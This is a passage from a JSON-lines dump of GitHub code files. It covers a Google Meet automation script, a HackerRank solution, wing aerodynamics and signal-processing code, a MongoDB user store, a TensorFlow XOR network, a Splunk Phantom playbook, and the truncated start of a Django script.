call_button=driver.find_element(\"xpath\",'//*[@id=\"yDmH0d\"]/c-wiz/div/div[2]/div/div[1]/div[3]/div/div[1]/div[2]/div/ul/li[2]/span[3]')\n call_button.click()\n print(\"Call pressed\")\n break\n except:\n pass\n \n\n \n \n while(True):\n try:\n driver.implicitly_wait(7)\n ex=driver.find_element(\"xpath\",'//*[@id=\"ow3\"]/div[1]/div/div[10]/div[3]/div[10]/div[3]/div[3]/div/div/div[1]/span/button')\n\n ex.click()\n\n link=driver.find_element(\"xpath\",'//*[@id=\"ow3\"]/div[1]/div/div[10]/div[3]/div[4]/div[2]/div[2]/div[1]/div[2]/div[2]/div[1]')\n print(link.text)\n LINK=link.text\n sms_send()\n break\n except:\n pass\n \n\n\n\n\n\n\ndef fun(parent):\n\n global flag,count,video_capture\n video_capture.release()\n print(\"CAMERA TURNED OFF\")\n\n # create chrome instance\n opt=webdriver.ChromeOptions()\n opt.add_experimental_option('excludeSwitches', ['enable-logging'])\n opt.add_argument('--disable-blink-features=AutomationControlled')\n opt.add_argument('--start-maximized') #chrome browser will always open in full screen\n opt.add_argument('--disable-extensions') #disable all chrome extension\n\n #pass the arguments 1 to allow and 2 to block\n opt.add_experimental_option(\"prefs\", {\n \"profile.default_content_setting_values.media_stream_mic\": 1,\n \"profile.default_content_setting_values.media_stream_camera\": 1,\n \"profile.default_content_setting_values.geolocation\": 2,\n \"profile.default_content_setting_values.notifications\": 1\n })\n\n #Gives path to chrome webdriver and loads classroom webpage\n driver = webdriver.Chrome(options=opt,service=Service(ChromeDriverManager().install()))\n\n driver.get(\n 'https://apps.google.com/meet/?hs=197')\n video_call(driver,user_name,password)\n\n\n is_closed=False\n while(not is_closed):\n try:\n isc=driver.find_element(\"xpath\",'//*[@id=\"ow3\"]/div[1]/div/div[10]/div[3]/div[10]/div[3]/div[3]/div/div/div[1]/span/button')\n except:\n is_closed=True\n flag=0\n count=0\n parent.quit() \n\n\n","repo_name":"HEMALSEBASTIAN/face-detection","sub_path":"combined3.py","file_name":"combined3.py","file_ext":"py","file_size_in_byte":11503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21929769648","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the catAndMouse function below.\ndef catAndMouse(x, y, z):\n kcA=abs(z-x)\n kcB=abs(z-y)\n if (kcA==kcB):\n return \"Mouse C\"\n elif (kcA 0\n array_mend_1st_direc_index = np.array(mend_1st_direc_index).squeeze()\n _1st_comp_direc[array_mend_1st_direc_index] = - _1st_comp_direc[array_mend_1st_direc_index]\n # print('_1st_comp_direc:',_1st_comp_direc)\n # self.out1st = _1st_comp_direc\n _2nd_comp_direc = self.Normalize(self.eFV)\n ## self.Number_of_BladeElements x 3-dim\n # print('_2nd_comp_direc',_2nd_comp_direc)\n\n _3rd_and_4th_comp_direc_single = np.cross(np.array(self.LERT.transpose())[0,:], np.array(self.chordD.transpose())[0,:])\n _3rd_and_4th_comp_direc \\\n = np.matrix(np.tile(_3rd_and_4th_comp_direc_single, (self.Number_of_BladeElements,1)))\n mend_3rd_and_4th_comp_direc_index = np.dot(self.eFV, _3rd_and_4th_comp_direc_single) < 0\n array_mend_3rd_and_4th_comp_direc_index = np.array(mend_3rd_and_4th_comp_direc_index).squeeze()\n _3rd_and_4th_comp_direc[array_mend_3rd_and_4th_comp_direc_index] =\\\n - _3rd_and_4th_comp_direc[array_mend_3rd_and_4th_comp_direc_index]\n # print('_3rd_and_4th_comp_direc:',_3rd_and_4th_comp_direc)\n # _3rd_and_4th_comp_direc[array_mend_3rd_and_4th_comp_direc_index] = - _3rd_and_4th_comp_direc[array_mend_3rd_and_4th_comp_direc_index]\n ## 1 x 3-dim F_r and F_a share the same direction\n # print('np.array(self.LERT.transpose())[0,:]:', np.array(self.LERT.transpose())[0,:])\n # print('np.array(self.chordD.transpose())[0,:]:', np.array(self.chordD.transpose())[0,:])\n # print('_3rd_and_4th_comp_direc:', _3rd_and_4th_comp_direc)\n\n #################### Amplitude and direction composation ###############\n # self. F_t_lift_per_BE = np.multiply(np.transpose(np.mat(F_t_lift_amp)),_1st_comp_direc) ## self.Number_of_BladeElements x 3-dim\n # self. F_t_drag_per_BE = np.multiply(np.transpose(np.mat(F_t_drag_amp)),_2nd_comp_direc) ## self.Number_of_BladeElements x 3-dim\n # self. F_r_per_BE = np.outer (np.transpose(np.mat(F_r_amp)), _3rd_and_4th_comp_direc) ## self.Number_of_BladeElements x 3-dim\n # self. F_a_per_BE = np.outer (np.transpose(np.mat(F_a_amp)), _3rd_and_4th_comp_direc) ## self.Number_of_BladeElements x 3-dim\n\n Sum_abs_of_F_t_lift_amp = np.sum(np.abs(F_t_lift_amp))\n Sum_abs_of_F_r_amp = np.sum(np.abs(F_r_amp))\n Sum_abs_of_F_a_amp = np.sum(np.abs(F_a_amp))\n \n Sign_sum_of_F_t_lift_amp = np.sign(np.sum(F_t_lift_amp))\n Sign_sum_of_F_r_amp = np.sign(np.sum(F_r_amp))\n Sign_sum_of_F_a_amp = np.sign(np.sum(F_a_amp))\n\n if Sum_abs_of_F_t_lift_amp > self.SMALL_CONSTANT_4_NOMALIZATION:\n Weighted_F_t_lift_amp = Sign_sum_of_F_t_lift_amp * F_t_lift_amp / (Sum_abs_of_F_t_lift_amp + self.SMALL_CONSTANT_4_NOMALIZATION)\n else:\n Weighted_F_t_lift_amp = 1 / self.Number_of_BladeElements\n\n if Sum_abs_of_F_r_amp > self.SMALL_CONSTANT_4_NOMALIZATION:\n Weighted_F_r_amp = Sign_sum_of_F_r_amp * F_r_amp / (Sum_abs_of_F_r_amp + self.SMALL_CONSTANT_4_NOMALIZATION)\n else:\n Weighted_F_r_amp = 1 / self.Number_of_BladeElements\n\n if Sum_abs_of_F_a_amp > self.SMALL_CONSTANT_4_NOMALIZATION:\n Weighted_F_a_amp = Sign_sum_of_F_a_amp * F_a_amp / (Sum_abs_of_F_a_amp+ self.SMALL_CONSTANT_4_NOMALIZATION)\n else:\n Weighted_F_a_amp = 1 / self.Number_of_BladeElements\n\n\n\n # print('Weighted_F_t_lift_amp:',Weighted_F_t_lift_amp)\n # print('Weighted_F_r_amp:',Weighted_F_r_amp)\n # print('Weighted_F_a_amp:', Sum_of_F_a_amp)\n # print('F_r_amp',F_r_amp)\n ### Below are the results\n self. F_t_lift = np.multiply(F_t_lift_amp, _1st_comp_direc) ## 检查求和及相乘的顺序\n self. F_t_drag = np.multiply(F_t_drag_amp, _2nd_comp_direc)\n self. F_r = np.multiply(F_r_amp, _3rd_and_4th_comp_direc) ## 检查计算方法\n self. F_a = np.multiply(F_a_amp, _3rd_and_4th_comp_direc)\n # print('F_t_lift:', np.sum(self.F_t_lift, axis = 0))\n # print('F_t_drag:', np.sum(self.F_t_drag, axis = 0))\n # print('F_r:', np.sum(self.F_r, axis = 0))\n # print('F_a:', np.sum(self.F_a, axis = 0))\n\n raw_X_pos_t = np.sum(np.multiply(Weighted_F_t_lift_amp, np.mat(self.x_data).transpose()))\n raw_X_pos_r = np.sum(np.multiply(Weighted_F_r_amp, np.mat(self.x_data).transpose())) ##或许应该求算数平均数\n raw_X_pos_a = np.sum(np.multiply(Weighted_F_a_amp, np.mat(self.x_data).transpose()))\n\n\n raw_Y_pos_t = - np.sum(np.multiply(np.multiply(Weighted_F_t_lift_amp, np.mat(np.abs(self.y_data)).transpose()),\\\n (np.abs(-self.AoA.transpose()+np.pi)/np.pi).transpose()))\n raw_Y_pos_r = - 0.5 * np.sum(np.multiply(Weighted_F_r_amp, np.mat(np.abs(self.y_data)).transpose()))\n raw_Y_pos_a = - 0.5625 * np.sum(np.multiply(Weighted_F_a_amp, np.mat(np.abs(self.y_data)).transpose()))\n\n raw_pos_t = np.array(np.matmul(self.virturalWingPlaneRelative2Wing.transpose(), np.array([raw_X_pos_t, raw_Y_pos_t, 0]))).squeeze()\n raw_pos_r = np.array(np.matmul(self.virturalWingPlaneRelative2Wing.transpose(), np.array([raw_X_pos_r, raw_Y_pos_r, 0]))).squeeze()\n raw_pos_a = np.array(np.matmul(self.virturalWingPlaneRelative2Wing.transpose(), np.array([raw_X_pos_a, raw_Y_pos_a, 0]))).squeeze()\n \n # print(raw_pos_t)\n self. X_pos_t = raw_pos_t[0]\n self. Y_pos_t = raw_pos_t[1]\n \n self. X_pos_r = raw_pos_r[0]\n self. Y_pos_r = raw_pos_r[1]\n \n self. X_pos_a = raw_pos_a[0]\n self. Y_pos_a = raw_pos_a[1]\n ### We need the relationship graph\n ## And we need initialize all the parameters in the _init_\n\n\n\n\n\n\n","repo_name":"Chainplain/FlappingwingSimu","sub_path":"Bladelement.py","file_name":"Bladelement.py","file_ext":"py","file_size_in_byte":25142,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"9981776876","text":"import numpy as np\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nimport numpy as np\nfrom utils.envelope_process import envelope\nfrom utils.filter import iir_design_filter\nimport matlab.engine\neng = matlab.engine.start_matlab()\nconfig = {\n \"font.family\": 'Times New Roman',\n}\nrcParams.update(config)\n\ndef process_data(data):\n data = data * 5 / 1024\n # data = (data - min(data)) / (max(data) - min(data))\n F = iir_design_filter(f_pass=40.0, f_stop=48.0, a_pass=1.0, a_stop=80.0) # f_pass=40.0, f_stop=48.0, a_pass=1.0, a_stop=80.0\n filtered_data = F.filter_(raw_data=data)\n upper, _ = envelope(filtered_data, 100).start()\n upper = upper.reshape(-1)\n smooth = matlab.double(initializer=list(upper), size=(1, len(upper)), is_complex=False)\n smooth = eng.smoothdata(smooth, 'gaussian', 300, nargout=1)\n smooth = smooth[0]\n \n return data[int(2302 * 2):], filtered_data[int(2302 * 2):], upper[int(2302 * 2):], smooth[int(2302 * 2):]\n\nytick_marks = [1.0, 2.0, 3.0]\ntime = 10\nt = np.linspace(0, time, int(2302 * time))\nplt.figure(figsize=(18, 6))\n\nraw_data = np.loadtxt('YCW_8s_1.csv', delimiter=',')\ndata, filtered_data, upper, smooth = process_data(raw_data)\nnp.savetxt('smooth_data.csv', smooth)\n# plt.subplot(1, 2, (1, 2))\n# plt.plot(time, data, label='Original Signal', linewidth=3, color='#1f77b4')\n# plt.plot(time, filtered_data, label='Filtered Signal', linewidth=3, color='#ff7f0e')\n# plt.xticks(fontsize=30, weight=10)\n# plt.yticks([0, 2.5, 5], fontsize=30, weight=10)\n# plt.ylabel('Voltage (V)', fontsize=30)\n# plt.xlabel('Time (s)', fontsize=30)\n# plt.legend(fontsize=24, loc='upper right')\n# plt.ylim([0,5])\n# plt.xlim([0,14])\n# plt.tight_layout()\n\n\nplt.subplot(1, 2, 1)\nplt.plot(t, filtered_data, label='Filtered Signal', linewidth=3, color='#ff7f0e')\nplt.plot(t, upper, label='Enveloped Signal', linewidth=3, color='#2ca02c')\nplt.xticks([0, 2, 4, 6, 8, 10], fontsize=40, weight=10)\nplt.yticks([1, 2], fontsize=40, weight=10)\nplt.ylabel('Voltage (V)', fontsize=40)\nplt.xlabel('Time (s)', fontsize=40)\nplt.legend(fontsize=35, loc='upper left')\nplt.ylim([0.8, 2.2])\nplt.xlim([0,10])\nplt.tight_layout()\n\nplt.subplot(1, 2, 2)\nplt.plot(t, filtered_data, label='Filtered Signal', linewidth=3, color='#ff7f0e')\nplt.plot(t, upper, label='Enveloped Signal', linewidth=3, color='#2ca02c')\nplt.yticks([1], fontsize=40, weight=10)\nplt.xticks([3, 4, 5], fontsize=40, weight=10)\nplt.ylabel('Voltage (V)', fontsize=40)\nplt.xlabel('Time (s)', fontsize=40)\n# plt.legend(fontsize=25, loc='upper right')\nplt.ylim([0.9, 1.7])\nplt.xlim([3, 5])\nplt.tight_layout()\n\n# plt.subplot(1, 2, 2)\n# plt.plot(t, filtered_data, label='Filtered Signal', linewidth=2, color='#ff7f0e')\n# plt.plot(t, upper, label='Envelope Signal', linewidth=3, color='#2ca02c')\n# plt.yticks([1], fontsize=25, weight=10)\n# plt.xticks([3, 4, 5], fontsize=25, weight=10)\n# plt.ylabel('Voltage (V)', fontsize=30)\n# plt.xlabel('Time (s)', fontsize=30)\n# plt.legend(fontsize=25, loc='upper right')\n# plt.ylim([0.9, 1.7])\n# plt.xlim([3, 5])\n# plt.tight_layout()\n\nplt.show()","repo_name":"Dominique-Yiu/National-IS-Contest","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37249064019","text":"import itertools\r\n\r\nn, m = map(int,input().split())\r\n\r\n_list = []\r\nfor i in range(1,n+1):\r\n _list.append(i)\r\n\r\niter = itertools.permutations(_list, m)\r\n\r\nfor j in iter:\r\n print(' '.join(map(str, j)))","repo_name":"Junho1224/junQ","sub_path":"백준/Silver/15649. N과 M (1)/N과 M (1).py","file_name":"N과 M (1).py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15007901996","text":"import argparse\nimport os\n\ntry:\n import colorama\n import pdfkit\n from colorama import Fore, Style, init\nexcept ModuleNotFoundError as e:\n print(f\"Gerekli modülleri yükleyin: 'python -m pip install {e.name}'\")\n\ninit(autoreset=True)\n\n# https://github.com/wkhtmltopdf/wkhtmltopdf/releases\n# choco install wkhtmltopdf\npath_wkthmltopdf = r'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'\nconfig = pdfkit.configuration(wkhtmltopdf=path_wkthmltopdf)\ncss = r\"C:\\Users\\Yedhrab\\Desktop\\workspace\\markdown-pdf.css\"\n\nparser = argparse.ArgumentParser(description='HTML to PDF.')\nparser.add_argument(\n '--input-dir',\n '-i',\n dest=\"inputDir\",\n default=os.getcwd(),\n help='Path of html items',\n type=str,\n)\nparser.add_argument(\n '--output',\n \"-o\",\n dest=\"outDir\",\n default=\"out\",\n help='Pdf outputs destionation (default \"out\")',\n)\nparser.add_argument(\n '--css',\n \"-c\",\n dest=\"css\",\n default=None,\n help='Custom css style for PDF (default None)',\n)\n\nargs = parser.parse_args()\n\noutDir = os.path.join(args.inputDir, args.outDir)\nif not os.path.exists(outDir):\n os.mkdir(outDir)\n\nfor name in os.listdir(args.inputDir):\n if \".html\" in name:\n _input = os.path.join(args.inputDir, name)\n _output = os.path.join(outDir, name.replace('.html', ''))\n\n print(Fore.CYAN + f\"Converting: {_input}\")\n\n try:\n if args.css is None:\n pdfkit.from_file(\n f\"{_input}\", f\"{_output}.pdf\", configuration=config)\n else:\n pdfkit.from_file(f\"{_input}\", f\"{_output}.pdf\",\n configuration=config, css=css)\n print(Fore.GREEN + \"Succes!\")\n except Exception as e:\n print(Fore.YELLOW + f\"Error while converting.\")\n","repo_name":"yemreak/yScripts","sub_path":"Python Script/html_to_pdf.py","file_name":"html_to_pdf.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"8037498605","text":"class Object:\n def __init__(self, name, id, mass, pos, vel):\n self.name = name\n self.id = id\n self.mass = mass\n self.pos = {\n 'x': pos[0],\n 'y': pos[1],\n 'z': pos[2]\n }\n self.vel = {\n 'x': vel[0],\n 'y': vel[1],\n 'z': vel[2]\n }\n \n def distance(self, obj):\n return (\n obj.pos['x'] - self.pos['x'],\n obj.pos['y'] - self.pos['y'],\n obj.pos['z'] - self.pos['z']\n )","repo_name":"damianobacchin/three-body-problem","sub_path":"models/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72276547441","text":"#!/usr/bin/python\n\nimport logging\nfrom pymongo import MongoClient\nfrom gridfs import GridFS\nfrom object import Object\nfrom config import Config\n\n\nclass Database:\n client = None\n db = None\n fs = None\n isOperable = False\n\n position_selector = {\n 'key': 'position'\n }\n\n def __init__(self):\n try:\n keys = {'serverSelectionTimeoutMS': 4000}\n self.client = MongoClient(Config.DB_HOST, Config.DB_PORT)\n self.client.database_names()\n self.db = self.client[Config.DB_NAME]\n logging.info(\"Connected to mongo... ok\")\n\n self.fs = GridFS(self.db)\n logging.info(\"GridFS link... ok\")\n\n self.isOperable = True\n except Exception as e:\n logging.fatal(\"Connection to mongo failed (\" + str(e) + \")\")\n self.isOperable = False\n return\n\n def get_position(self):\n return self.db['settings'].find_one(self.position_selector)['value']\n\n def update_position(self, position):\n up = {\n '$set': {\n 'value': position\n }\n }\n\n self.db['settings'].update_one(self.position_selector, up)\n return\n\n def insert_user(self, user):\n if not self.isOperable:\n logging.error(\"Trying insert user in non-valid db!\")\n return False\n\n photo_id = None\n\n if (user.photo is not None) and (len(user.photo) > 0):\n photo_id = self.fs.put(user.photo, filename=str(user.sdo_id) + \".png\")\n\n o = Object()\n o.first_name = user.first_name\n o.last_name = user.last_name\n o.sdo_id = user.sdo_id\n o.photo_grid_fs_id = photo_id\n\n insert_id = self.db['users'].insert_one(o.__dict__).inserted_id\n\n logging.info(\"User [\" + str(o.sdo_id) + \"] inserted with key: \" + str(insert_id))\n return True\n","repo_name":"Holovin/VS_SdoPhotoParser","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23957663882","text":"#!/usr/bin/env python3\r\n\r\ndef string_two_numbers_spliter():\r\n x, y = [int(i) for i in input().split()]\r\n return x, y\r\n\r\n\r\ndef swap_two_numbers_asc(x, y):\r\n x, y = y, x\r\n return x, y\r\n\r\n\r\ndef main():\r\n while True:\r\n x, y = string_two_numbers_spliter()\r\n if x == 0 and y == 0:\r\n break\r\n if x > y:\r\n x, y = swap_two_numbers_asc(x, y)\r\n print('%d %d' % (x, y))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n# NOTE AOJ question URL (Repetitive Processing - Swapping Two Numbers?):\r\n# http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=ITP1_3_C\r\n\r\n# NOTE Web pages inspired me to sove this question:\r\n# Is there a standardized method to swap two variables in Python?:\r\n# http://stackoverflow.com/q/14836228/1334728\r\n","repo_name":"shoichiaizawa/aoj_python3","sub_path":"itp1/03c_swapping_two_numbers.py","file_name":"03c_swapping_two_numbers.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3222492752","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport numpy.random as rd\nimport time\n\nsave_pth = './models/xor_model.ckpt'\n\nn_hidd = 2\nn_in = 2\nlearning_rate = 0.1\n\n# training data and labels\nX = np.array([[0., 0.], [0., 1.], [1., 0.], [1., 1.]])\nY = np.array([[0.], [1.], [1.], [0.]])\n\n\nw1 = tf.Variable(tf.random_uniform([n_in, n_hidd], -1, 1), trainable=True)\nb1 = tf.Variable(tf.zeros(n_hidd))\nw2 = tf.Variable(tf.random_uniform([n_hidd, 1], -1, 1), trainable=True)\nb2 = tf.Variable(tf.zeros(1))\n\nx = tf.placeholder(shape=(None, X.shape[1]), dtype=tf.float32)\nz = tf.matmul(x, w1) + b1\na = tf.nn.relu(z)\n\ny = tf.nn.sigmoid(tf.matmul(a, w2) + b2)\nz_ = tf.placeholder(shape=(None, 1), dtype=tf.float32)\n\ncost = tf.reduce_mean(((z_ * tf.log(y)) + ((1 - z_) * tf.log(1.0 - y))) * -1)\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(z_,1))\n#accuracy = tf.reduce_mean(tf.cast(correct_prediction))\n\ninit = tf.global_variables_initializer()\n\nsaver = tf.train.Saver()\nsess = tf.Session()\nsess.run(init)\n\nfor i in range(5000):\n sess.run(train_step, feed_dict={x: X, z_: Y})\n\n loss = sess.run(cost, feed_dict={x: X, z_: Y})\n #acc = sess.run(accuracy, feed_dict={x: X, z_: Y})\n\n if i%1000 == 0:\n print('Iteration : {}, loss : {:.3f}'.format(i, loss))\n\nsaver.save(sess, save_pth)\n\n# test data and test labels\nX_test = np.array([[1., 1.], [0., 0.], [1., 0.], [1., 1.], [1., 0], [0., 1.], [0., 0.], [0., 1.], [0., 1.], [1., 1.], [1., 0.]])\nY_test = np.array([[0.], [0.], [1.], [0.], [1.], [1.] , [0.], [1.], [1.], [0.], [1.]], dtype=np.float32)\n\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(z_,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nacc = sess.run(accuracy, feed_dict={x: X_test, z_: Y_test})\nprint('Acc = {:.3f}%'.format(acc*100))\n\n","repo_name":"enizimus/XOR_nn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22392215536","text":"\"\"\"\n\n\"\"\"\n\n\nimport phantom.rules as phantom\nimport json\nfrom datetime import datetime, timedelta\n\n\ndef on_start(container):\n phantom.debug('on_start() called')\n\n # call 'string_to_uppercase_1' block\n string_to_uppercase_1(container=container)\n\n return\n\ndef format_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"format_1() called\")\n\n template = \"\"\"find_peers server=\\\"{0}\\\"\\n\"\"\"\n\n # parameter list for template variable replacement\n parameters = [\n \"string_to_uppercase_1:custom_function_result.data.uppercase_string\"\n ]\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.format(container=container, template=template, parameters=parameters, name=\"format_1\")\n\n run_query_1(container=container)\n\n return\n\n\ndef string_to_uppercase_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"string_to_uppercase_1() called\")\n\n container_artifact_data = phantom.collect2(container=container, datapath=[\"artifact:*.cef.destination\",\"artifact:*.id\"])\n\n parameters = []\n\n # build parameters list for 'string_to_uppercase_1' call\n for container_artifact_item in container_artifact_data:\n parameters.append({\n \"input_string\": container_artifact_item[0],\n })\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.custom_function(custom_function=\"community/string_to_uppercase\", parameters=parameters, name=\"string_to_uppercase_1\", callback=format_1)\n\n return\n\n\ndef run_query_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"run_query_1() called\")\n\n # phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n\n format_1 = phantom.get_format_data(name=\"format_1\")\n\n parameters = []\n\n if format_1 is not None:\n parameters.append({\n \"query\": format_1,\n \"command\": \"savedsearch\",\n })\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.act(\"run query\", parameters=parameters, name=\"run_query_1\", assets=[\"esabwrev\"], callback=run_query_1_callback)\n\n return\n\n\ndef run_query_1_callback(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"run_query_1_callback() called\")\n\n \n prompt_1(action=action, success=success, container=container, results=results, handle=handle, filtered_artifacts=filtered_artifacts, filtered_results=filtered_results)\n l5_cf_get_query_results_py3_4(action=action, success=success, container=container, results=results, handle=handle, filtered_artifacts=filtered_artifacts, filtered_results=filtered_results)\n\n\n return\n\n\ndef prompt_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"prompt_1() called\")\n\n # set user and message variables for phantom.prompt call\n\n user = \"admin\"\n message = \"\"\"here's the list\\n\\n{0} priority: {1} count:{2}\"\"\"\n\n # parameter list for template variable replacement\n parameters = [\n \"run_query_1:action_result.data.*.peer\",\n \"run_query_1:action_result.data.*.priority\",\n \"run_query_1:action_result.data.*.count\"\n ]\n\n # responses\n response_types = [\n {\n \"prompt\": \"Update event?\",\n \"options\": {\n \"type\": \"list\",\n \"choices\": [\n \"Yes\",\n \"No\"\n ],\n },\n },\n {\n \"prompt\": \"comment:\",\n \"options\": {\n \"type\": \"message\",\n },\n }\n ]\n\n phantom.prompt2(container=container, user=user, message=message, respond_in_mins=30, name=\"prompt_1\", parameters=parameters, response_types=response_types, callback=decision_1)\n\n return\n\n\ndef decision_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"decision_1() called\")\n\n # check for 'if' condition 1\n found_match_1 = phantom.decision(\n container=container,\n conditions=[\n [\"prompt_1:action_result.summary.responses.0\", \"==\", \"Yes\"]\n ])\n\n # call connected blocks if condition 1 matched\n if found_match_1:\n update_event_1(action=action, success=success, container=container, results=results, handle=handle)\n return\n\n return\n\n\ndef update_event_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"update_event_1() called\")\n\n # phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n\n prompt_1_result_data = phantom.collect2(container=container, datapath=[\"prompt_1:action_result.summary.responses.1\",\"prompt_1:action_result.parameter.context.artifact_id\"], action_results=results)\n container_artifact_data = phantom.collect2(container=container, datapath=[\"artifact:*.cef.notable_id\",\"artifact:*.id\"])\n\n parameters = []\n\n # build parameters list for 'update_event_1' call\n for prompt_1_result_item in prompt_1_result_data:\n for container_artifact_item in container_artifact_data:\n if container_artifact_item[0] is not None:\n parameters.append({\n \"status\": \"in progress\",\n \"comment\": prompt_1_result_item[0],\n \"urgency\": \"critical\",\n \"event_ids\": container_artifact_item[0],\n \"context\": {'artifact_id': container_artifact_item[1]},\n })\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.act(\"update event\", parameters=parameters, name=\"update_event_1\", assets=[\"esabwrev\"])\n\n return\n\n\ndef playbook_create_events_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"playbook_create_events_1() called\")\n\n l5_cf_get_query_results_py3_4__result = phantom.collect2(container=container, datapath=[\"l5_cf_get_query_results_py3_4:custom_function_result.data.results_list\"])\n\n l5_cf_get_query_results_py3_4_data_results_list = [item[0] for item in l5_cf_get_query_results_py3_4__result]\n\n inputs = {\n \"mylist\": l5_cf_get_query_results_py3_4_data_results_list,\n }\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n # call playbook \"chris/create events\", returns the playbook_run_id\n playbook_run_id = phantom.playbook(\"chris/create events\", container=container, inputs=inputs)\n\n return\n\n\ndef l5_cf_get_query_results_py3_4(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"l5_cf_get_query_results_py3_4() called\")\n\n id_value = container.get(\"id\", None)\n run_query_1_result_data = phantom.collect2(container=container, datapath=[\"run_query_1:action_result.data.*.peer\",\"run_query_1:action_result.data.*.priority\",\"run_query_1:action_result.data.*.count\",\"run_query_1:action_result.parameter.context.artifact_id\"], action_results=results)\n\n run_query_1_result_item_0 = [item[0] for item in run_query_1_result_data]\n run_query_1_result_item_1 = [item[1] for item in run_query_1_result_data]\n run_query_1_result_item_2 = [item[2] for item in run_query_1_result_data]\n\n parameters = []\n\n parameters.append({\n \"peer\": run_query_1_result_item_0,\n \"priority\": run_query_1_result_item_1,\n \"count\": run_query_1_result_item_2,\n \"container\": id_value,\n })\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.custom_function(custom_function=\"chris/L5_CF_Get_Query_Results_py3\", parameters=parameters, name=\"l5_cf_get_query_results_py3_4\", callback=playbook_create_events_1)\n\n return\n\n\ndef on_finish(container, summary):\n phantom.debug(\"on_finish() called\")\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # This function is called after all actions are completed.\n # summary of all the action and/or all details of actions\n # can be collected here.\n\n # summary_json = phantom.get_summary()\n # if 'result' in summary_json:\n # for action_result in summary_json['result']:\n # if 'action_run_id' in action_result:\n # action_results = phantom.get_action_results(action_run_id=action_result['action_run_id'], result_data=False, flatten=False)\n # phantom.debug(action_results)\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n return","repo_name":"kshish/PhantomAdvancedImplementation","sub_path":"send to splunk.py","file_name":"send to splunk.py","file_ext":"py","file_size_in_byte":11601,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"8200695519","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom zeep import Client\nfrom overview.models import UserExpire\nfrom django.db.models import Max\nfrom datetime import datetime\nimport xml.etree.ElementTree as Et\nfrom data.common import MysqlOper\n\n\ndef inc_tempuser():\n dbconn = MysqlOper()\n\n CURRENT_DATE = datetime.today()\n timestr = 